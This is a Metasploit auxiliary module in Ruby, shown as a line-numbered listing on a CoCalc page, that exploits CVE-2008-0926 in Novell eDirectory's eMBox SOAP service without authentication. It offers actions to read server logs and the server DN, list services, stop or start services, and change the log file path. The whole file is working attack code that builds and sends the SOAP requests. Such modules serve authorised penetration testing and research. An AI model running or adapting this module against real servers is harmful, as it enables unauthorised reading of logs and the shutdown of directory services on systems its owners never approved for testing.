CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Exploit::Remote::HttpClient
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Novell eDirectory eMBox Unauthenticated File Access',
13
      'Description'    => %q{
14
          This module will access Novell eDirectory's eMBox service and can run the
15
        following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
16
        STOP_SERVICE, START_SERVICE, SET_LOGFILE.
17
      },
18
      'References'     =>
19
        [
20
          [ 'CVE', '2008-0926' ],
21
          [ 'BID', '28441' ],
22
          [ 'OSVDB', '43690' ]
23
        ],
24
      'Author'         =>
25
        [
26
          'Nicob',
27
          'MC',    #Initial Metasploit module
28
          'sinn3r'
29
        ],
30
      'License'        => MSF_LICENSE,
31
      'Actions'        =>
32
        [
33
          [
34
            'GET_DN',
35
            {
36
              'Description' => 'Get DN',
37
              'CMD'         => 'novell.embox.connmgr.serverinfo',
38
              'PATTERN'     => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
39
              'USE_PARAM'   => false
40
            }
41
          ],
42
          [
43
            'READ_LOGS',
44
            {
45
              'Description' => 'Read all the log files',
46
              'CMD'         => 'logger.readlog',
47
              'PATTERN'     => /<LogFileData>(.*)<\/LogFileData>/,
48
              'USE_PARAM'   => false
49
            }
50
          ],
51
          [
52
            'LIST_SERVICES',
53
            {
54
              'Description' => 'List services',
55
              'CMD'         => 'novell.embox.service.getServiceList',
56
              'PATTERN'     => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
57
              'USE_PARAM'   => false
58
            }
59
          ],
60
          [
61
            'STOP_SERVICE',
62
            {
63
              'Description' => 'Stop a service',
64
              'CMD'         => 'novell.embox.service.stopService',
65
              'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
66
              'PARAM'       => '<Parameters><params xmlns:DSService="service.dtd">'+
67
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
68
                               '</params></Parameters>',
69
              'USE_PARAM'   => true
70
            }
71
          ],
72
          [
73
            'START_SERVICE',
74
            {
75
              'Description' => 'Start a service',
76
              'CMD'         => 'novell.embox.service.startService',
77
              'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
78
              'PARAM'       => '<Parameters>' +
79
                               '<params xmlns:DSService="service.dtd">' +
80
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
81
                               '</params></Parameters>',
82
              'USE_PARAM'   => true
83
            }
84
          ],
85
          [
86
            'SET_LOGFILE',
87
            {
88
              'Description' => 'Read Log File',
89
              'CMD'         => 'logger.setloginfo',
90
              'PATTERN'     => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
91
              'PARAM'       => '<Parameters><params><logFile>__PARAM__</logFile>'+
92
                               '<logOptionAppend/></params></Parameters>',
93
              'USE_PARAM'   => true
94
            }
95
          ]
96
        ],
97
      'DefaultAction'  => 'LIST_SERVICES'
98
    ))
99

100
    register_options(
101
      [
102
        Opt::RPORT(8028),
103
        OptString.new("PARAM", [false, 'Specify a parameter for the action'])
104
      ])
105
  end
106

107
  def run
108

109
    if action.opts['USE_PARAM']
110
      if datastore['PARAM'].nil? or datastore['PARAM'].empty?
111
        print_error("You must supply a parameter for action: #{action.name}")
112
        return
113
      else
114
        param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
115
      end
116
    else
117
      param = '<Parameters><params/></Parameters>'
118
    end
119

120
    template = %Q|<?xml version="1.0"?>
121
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
122
    <SOAP-ENV:Header/>
123
    <SOAP-ENV:Body>
124
    <dispatch>
125
    <Action>#{action.opts['CMD']}</Action>
126
    <Object/>#{param}</dispatch>
127
    </SOAP-ENV:Body>
128
    </SOAP-ENV:Envelope>|
129

130
    template = template.gsub(/^ {4}/, '')
131
    template = template.gsub(/\n/, '')
132

133
    connect
134
    print_status("Sending command: #{action.name}...")
135
    res = send_request_cgi({
136
      'method'   => 'POST',
137
      'uri'      => '/SOAP',
138
      'data'     => template + "\n\n",
139
      'headers'  =>
140
        {
141
          'Content-Type' => 'text/xml',
142
          'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
143
        }
144
    }, 25)
145

146
    if res.nil?
147
      print_error("Did not get a response from server")
148
      return
149
    end
150

151
    raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
152
    print_line("\n" + Rex::Text.decode_base64(raw_data))
153

154
    disconnect
155
  end
156
end
157

158